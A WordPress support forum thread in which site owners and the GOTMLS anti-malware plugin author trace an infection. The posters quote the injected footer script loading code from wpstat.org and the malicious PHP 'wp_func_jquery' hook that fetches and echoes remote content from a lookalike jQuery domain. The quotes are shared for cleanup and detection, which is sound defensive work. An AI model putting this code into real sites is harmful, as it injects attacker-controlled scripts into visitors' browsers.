Title: Malware php:agent-uf [trj] still loading a script.
Last modified: August 24, 2016

---

# Malware php:agent-uf [trj] still loading a script.

 *  Resolved [marcsohier](https://wordpress.org/support/users/marcsohier/)
 * (@marcsohier)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/)
 * Hello Eli,
 * Thanks for your great plugin. I am facing some issues with malwares injected 
   into my wordpress website.
 * Before to set up your plugin, I had manually removed infected files with the 
   code <?php include(‘assets/images/social.png’); ?>.
 * Then your plugin found one more file infected that I missed manually. Your plugin
   now says that my website is clean.
 * However, I still think my website is infected as using the Chrome Console I always
   find this script into my source code :
 *     ```
       <script type="text/javascript">
       var now = new Date().getTime();
       if (now%2 == 0) {
       if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.js"></scr'+'ipt>'); }
       }
       </script>
       ```
   
 * I’m trying for hours to solve this issue but I do not succeed. I’ve backed up
   my website locally and did thousands of string researches and I did not find 
   which file is calling this script just above the </footer>.
 * The file social.png add apparently some data in the Sql database but even here
   I did not find any relevant thing explaining how this code is loaded.
 * I would be really grateful if you have any idea or solution.
 * Thanks a lot for your great help to everyone.
 * Marc
 * [https://wordpress.org/plugins/gotmls/](https://wordpress.org/plugins/gotmls/)

Viewing 12 replies - 1 through 12 (of 12 total)

 *  Thread Starter [marcsohier](https://wordpress.org/support/users/marcsohier/)
 * (@marcsohier)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018484)
 * Here is my website : [http://www.angelinextension.com/](http://www.angelinextension.com/).
 * I forgot to mention that I have also tried to block this query using the plugin
   BBQ Block Bad Queries but it still loads the script.
 * Thanks you Eli,
 * Marc
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018513)
 * I see that script output in the HTML source code of your site, but without access
   to the back-end I won’t be able to determine where it is coming from. It may 
   be helpful for you to search the contents of your plugin and theme files for 
   this md5 hash 74be16979710d4c4e7c6647856088456 that is referenced by the comment
   just above the script output in question. If you find this in a PHP file then
   it is likely that the code that renders that malicious script is right below 
   it.
 * Let me know if you find it so I can add it to my definition updates. You can 
   contact me directly at: eli AT gotmls DOT net
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018651)
 * Thanks for sending me your info.
 * It looks to me like all those wp_func_jquery functions are malicious. I have 
   found at least 3 different variation of it in various plugin and in your theme
   but I don’t think it was originally part of any of those files. I know that code
   look pretty legitimate and this hacker has written it to integrate into WordPress
   better that a lot of the legitimate plugins out there, but if you look at the
   whole URL that is constructed it is not a legitimate domain to be downloading
   any jquery files from. And you would not really want to be remotely fetching 
   your jquery files from a third-party host at some obscure domain anyway.
 * All these wp_func_jquery functions are similar enough to say that they were written
   by the same hacker but they have been injected into different include files in
   unrelated plugins and themes. So, I collecting these new variants and adding 
   them to my definition updates now.
 * I expect that when they are all removed we will not see that script on in the
   output of your footer…
 *  Thread Starter [marcsohier](https://wordpress.org/support/users/marcsohier/)
 * (@marcsohier)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018773)
 * Eli, thanks a lot for your great help and amazing skills.
 * Marc
 *  [Metalp3n](https://wordpress.org/support/users/metalp3n/)
 * (@metalp3n)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018811)
 * How did you guys get that code removed? I seem to be having the very same issue
   in my footer as-well – and I have downloaded my entire directory and ran a search
   using FileSeek and can’t seem to find where that code made it in.
 *  [Metalp3n](https://wordpress.org/support/users/metalp3n/)
 * (@metalp3n)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018812)
 * The site btw is rapidpurple.com
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018813)
 * Have you tried using my Anti-Malware plugin to scan your site?
 * In the case of Marc’s site it was a custom function called wp_func_jquery that
   was hooked into WordPress using add_action in various theme and plugin files.
   I have added this threat to my Definition Updates so that it can be automatically
   fixed (even if it is not called “wp_func_jquery”).
 * You’ll need to register my plugin and download the latest Definition updates 
   but then it should be able to remove this threat for you.
 * Aloha, Eli
 *  [Metalp3n](https://wordpress.org/support/users/metalp3n/)
 * (@metalp3n)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018814)
 * Registering and giving it a go now. Fingers crossed Eli.
 *  [Metalp3n](https://wordpress.org/support/users/metalp3n/)
 * (@metalp3n)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018815)
 * You called it mate. The new definition updates squared this away also. Thanks
   Eli!
 * For anyone else – it seems the following was the ACTUAL code related to this:
 * if(!function_exists(‘wp_func_jquery’)) {
    function wp_func_jquery() { $host =‘
   [http://&#8217](http://&#8217);; $jquery = $host.’c’.’jquery.org/jquery-ui.js’;
   $headers = @get_headers($jquery, 1); if ($headers[0] == ‘HTTP/1.1 200 OK’){ echo(
   wp_remote_retrieve_body(wp_remote_get($jquery))); } } add_action(‘wp_footer’,‘
   wp_func_jquery’); }
 * This looked so weird to me too and yet I overlooked it due to the jquery.org 
   reference.
 *  [absoluteczech](https://wordpress.org/support/users/absoluteczech/)
 * (@absoluteczech)
 * [11 years ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018864)
 * [@metalp3n](https://wordpress.org/support/users/metalp3n/)
    thank you so much!
   that was the exact same code i had in my theme. i couldn’t figure out where it
   was coming from!
 *  [Metalp3n](https://wordpress.org/support/users/metalp3n/)
 * (@metalp3n)
 * [11 years ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018865)
 * [@absoluteczech](https://wordpress.org/support/users/absoluteczech/) glad to 
   help!
 *  [cosmln](https://wordpress.org/support/users/cosmln/)
 * (@cosmln)
 * [10 years, 9 months ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018908)
 * Hi,
 * Sorry that I’m entering on this uninvited but I have similar problems but with
   another version of the same(?) virus: PHP:Agent-IN[Trj] ([https://wordpress.org/support/topic/been-hacked-3](https://wordpress.org/support/topic/been-hacked-3)).
 * I have installed Anti-Malware from GOTMLS.NET found some problems but me almost
   a newbies and really don’t know what to do next.
 * Anyone can help?
 * Thank you,
    Cosmin

Viewing 12 replies - 1 through 12 (of 12 total)

The topic ‘Malware php:agent-uf [trj] still loading a script.’ is closed to new 
replies.

 * ![](https://ps.w.org/gotmls/assets/icon-256x256.png?rev=1001824)
 * [Anti-Malware Security and Brute-Force Firewall](https://wordpress.org/plugins/gotmls/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/gotmls/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/gotmls/)
 * [Active Topics](https://wordpress.org/support/plugin/gotmls/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/gotmls/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/gotmls/reviews/)

 * 12 replies
 * 5 participants
 * Last reply from: [cosmln](https://wordpress.org/support/users/cosmln/)
 * Last activity: [10 years, 9 months ago](https://wordpress.org/support/topic/malware-phpagent-uf-trj-still-loading-a-script/#post-6018908)
 * Status: resolved